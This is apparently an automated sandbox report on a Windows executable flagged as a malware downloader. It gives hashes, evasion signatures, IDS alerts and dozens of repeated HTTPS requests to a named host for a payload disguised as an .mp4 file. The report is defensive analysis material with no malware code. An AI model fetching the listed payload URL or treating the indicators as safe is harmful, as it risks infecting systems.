Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OfQ4QRmP65.exe

Overview

General Information

Sample name:OfQ4QRmP65.exe
renamed because original name is a hash value
Original sample name:da194a0285b5b4c9e69c4ae59430e286a81682c0db27e65a99215eb0f1e4fd2a.exe
Analysis ID:1631777
MD5:2b93577260f06791d5acc7d6d9a1c492
SHA1:6f4d46f7ceab6b310a0b705d772f4dfcb369545f
SHA256:da194a0285b5b4c9e69c4ae59430e286a81682c0db27e65a99215eb0f1e4fd2a
Tags:exeuser-adrian__luca
Infos:

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
Joe Sandbox ML detected suspicious sample
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • OfQ4QRmP65.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\OfQ4QRmP65.exe" MD5: 2B93577260F06791D5ACC7D6D9A1C492)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-07T15:48:04.821852+010028032742Potentially Bad Traffic192.168.2.11497005.2.84.236443TCP
2025-03-07T15:48:07.594123+010028032742Potentially Bad Traffic192.168.2.11497015.2.84.236443TCP
2025-03-07T15:48:10.383124+010028032742Potentially Bad Traffic192.168.2.11497025.2.84.236443TCP
2025-03-07T15:48:13.084766+010028032742Potentially Bad Traffic192.168.2.11497065.2.84.236443TCP
2025-03-07T15:48:15.807682+010028032742Potentially Bad Traffic192.168.2.11497085.2.84.236443TCP
2025-03-07T15:48:18.497229+010028032742Potentially Bad Traffic192.168.2.11497105.2.84.236443TCP
2025-03-07T15:48:21.420599+010028032742Potentially Bad Traffic192.168.2.11497115.2.84.236443TCP
2025-03-07T15:48:24.454426+010028032742Potentially Bad Traffic192.168.2.11497125.2.84.236443TCP
2025-03-07T15:48:27.263364+010028032742Potentially Bad Traffic192.168.2.11497135.2.84.236443TCP
2025-03-07T15:48:30.023082+010028032742Potentially Bad Traffic192.168.2.11497145.2.84.236443TCP
2025-03-07T15:48:32.677988+010028032742Potentially Bad Traffic192.168.2.11497155.2.84.236443TCP
2025-03-07T15:48:35.363432+010028032742Potentially Bad Traffic192.168.2.11497165.2.84.236443TCP
2025-03-07T15:48:38.042178+010028032742Potentially Bad Traffic192.168.2.11497175.2.84.236443TCP
2025-03-07T15:48:41.177668+010028032742Potentially Bad Traffic192.168.2.11497205.2.84.236443TCP
2025-03-07T15:48:43.960824+010028032742Potentially Bad Traffic192.168.2.11497215.2.84.236443TCP
2025-03-07T15:48:47.032034+010028032742Potentially Bad Traffic192.168.2.11497225.2.84.236443TCP
2025-03-07T15:48:49.714871+010028032742Potentially Bad Traffic192.168.2.11497235.2.84.236443TCP
2025-03-07T15:48:52.487854+010028032742Potentially Bad Traffic192.168.2.11497245.2.84.236443TCP
2025-03-07T15:48:55.243493+010028032742Potentially Bad Traffic192.168.2.11497255.2.84.236443TCP
2025-03-07T15:48:57.962934+010028032742Potentially Bad Traffic192.168.2.11497265.2.84.236443TCP
2025-03-07T15:49:00.732454+010028032742Potentially Bad Traffic192.168.2.11497275.2.84.236443TCP
2025-03-07T15:49:03.489313+010028032742Potentially Bad Traffic192.168.2.11497285.2.84.236443TCP
2025-03-07T15:49:06.234216+010028032742Potentially Bad Traffic192.168.2.11497295.2.84.236443TCP
2025-03-07T15:49:08.984079+010028032742Potentially Bad Traffic192.168.2.11497305.2.84.236443TCP
2025-03-07T15:49:11.696238+010028032742Potentially Bad Traffic192.168.2.11497315.2.84.236443TCP
2025-03-07T15:49:14.467404+010028032742Potentially Bad Traffic192.168.2.11497325.2.84.236443TCP
2025-03-07T15:49:17.226749+010028032742Potentially Bad Traffic192.168.2.11497335.2.84.236443TCP
2025-03-07T15:49:19.944143+010028032742Potentially Bad Traffic192.168.2.11497345.2.84.236443TCP
2025-03-07T15:49:22.626365+010028032742Potentially Bad Traffic192.168.2.11497355.2.84.236443TCP
2025-03-07T15:49:25.317866+010028032742Potentially Bad Traffic192.168.2.11497365.2.84.236443TCP
2025-03-07T15:49:27.947199+010028032742Potentially Bad Traffic192.168.2.11497375.2.84.236443TCP
2025-03-07T15:49:30.602911+010028032742Potentially Bad Traffic192.168.2.11497385.2.84.236443TCP
2025-03-07T15:49:33.651459+010028032742Potentially Bad Traffic192.168.2.11497395.2.84.236443TCP
2025-03-07T15:49:36.586758+010028032742Potentially Bad Traffic192.168.2.11497405.2.84.236443TCP
2025-03-07T15:49:39.548730+010028032742Potentially Bad Traffic192.168.2.11497415.2.84.236443TCP
2025-03-07T15:49:42.381164+010028032742Potentially Bad Traffic192.168.2.11497425.2.84.236443TCP
2025-03-07T15:49:45.213974+010028032742Potentially Bad Traffic192.168.2.11497435.2.84.236443TCP
2025-03-07T15:49:48.286545+010028032742Potentially Bad Traffic192.168.2.11497445.2.84.236443TCP
2025-03-07T15:49:51.110173+010028032742Potentially Bad Traffic192.168.2.11497455.2.84.236443TCP
2025-03-07T15:49:54.211405+010028032742Potentially Bad Traffic192.168.2.11497465.2.84.236443TCP
2025-03-07T15:49:57.026369+010028032742Potentially Bad Traffic192.168.2.11497475.2.84.236443TCP
2025-03-07T15:50:00.132403+010028032742Potentially Bad Traffic192.168.2.11497485.2.84.236443TCP
2025-03-07T15:50:03.099242+010028032742Potentially Bad Traffic192.168.2.11497495.2.84.236443TCP
2025-03-07T15:50:06.075586+010028032742Potentially Bad Traffic192.168.2.11497505.2.84.236443TCP
2025-03-07T15:50:08.783291+010028032742Potentially Bad Traffic192.168.2.11497515.2.84.236443TCP
2025-03-07T15:50:11.723178+010028032742Potentially Bad Traffic192.168.2.11497525.2.84.236443TCP
2025-03-07T15:50:14.697100+010028032742Potentially Bad Traffic192.168.2.11497535.2.84.236443TCP
2025-03-07T15:50:17.600518+010028032742Potentially Bad Traffic192.168.2.11497545.2.84.236443TCP
2025-03-07T15:50:20.524200+010028032742Potentially Bad Traffic192.168.2.11497555.2.84.236443TCP
2025-03-07T15:50:23.483363+010028032742Potentially Bad Traffic192.168.2.11497565.2.84.236443TCP
2025-03-07T15:50:26.150071+010028032742Potentially Bad Traffic192.168.2.11497575.2.84.236443TCP
2025-03-07T15:50:28.953930+010028032742Potentially Bad Traffic192.168.2.11497585.2.84.236443TCP
2025-03-07T15:50:31.728756+010028032742Potentially Bad Traffic192.168.2.11497595.2.84.236443TCP
2025-03-07T15:50:34.828218+010028032742Potentially Bad Traffic192.168.2.11497605.2.84.236443TCP
2025-03-07T15:50:37.546130+010028032742Potentially Bad Traffic192.168.2.11497615.2.84.236443TCP
2025-03-07T15:50:40.285644+010028032742Potentially Bad Traffic192.168.2.11497625.2.84.236443TCP
2025-03-07T15:50:43.089473+010028032742Potentially Bad Traffic192.168.2.11497635.2.84.236443TCP
2025-03-07T15:50:45.967075+010028032742Potentially Bad Traffic192.168.2.11497645.2.84.236443TCP
2025-03-07T15:50:48.850356+010028032742Potentially Bad Traffic192.168.2.11497655.2.84.236443TCP
2025-03-07T15:50:51.712437+010028032742Potentially Bad Traffic192.168.2.11497665.2.84.236443TCP
2025-03-07T15:50:54.506175+010028032742Potentially Bad Traffic192.168.2.11497675.2.84.236443TCP
2025-03-07T15:50:57.289063+010028032742Potentially Bad Traffic192.168.2.11497685.2.84.236443TCP
2025-03-07T15:50:59.968992+010028032742Potentially Bad Traffic192.168.2.11497695.2.84.236443TCP
2025-03-07T15:51:02.843672+010028032742Potentially Bad Traffic192.168.2.11497705.2.84.236443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: OfQ4QRmP65.exeAvira: detected
Source: OfQ4QRmP65.exeVirustotal: Detection: 68%Perma Link
Source: OfQ4QRmP65.exeReversingLabs: Detection: 73%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: OfQ4QRmP65.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49761 version: TLS 1.2
Source: OfQ4QRmP65.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49701 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49721 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49706 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49720 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49727 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49730 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49713 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49723 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49724 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49734 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49708 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49700 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49722 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49726 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49741 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49770 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49739 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49745 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49731 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49710 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49736 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49716 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49711 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49733 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49769 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49732 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49762 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49746 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49752 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49747 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49753 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49717 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49758 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49764 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49742 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49767 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49756 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49728 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49735 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49765 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49757 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49749 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49740 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49712 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49737 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49766 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49738 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49702 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49755 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49744 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49715 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49754 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49729 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49759 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49768 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49714 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49750 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49761 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49748 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49743 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49725 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49751 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49760 -> 5.2.84.236:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49763 -> 5.2.84.236:443
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
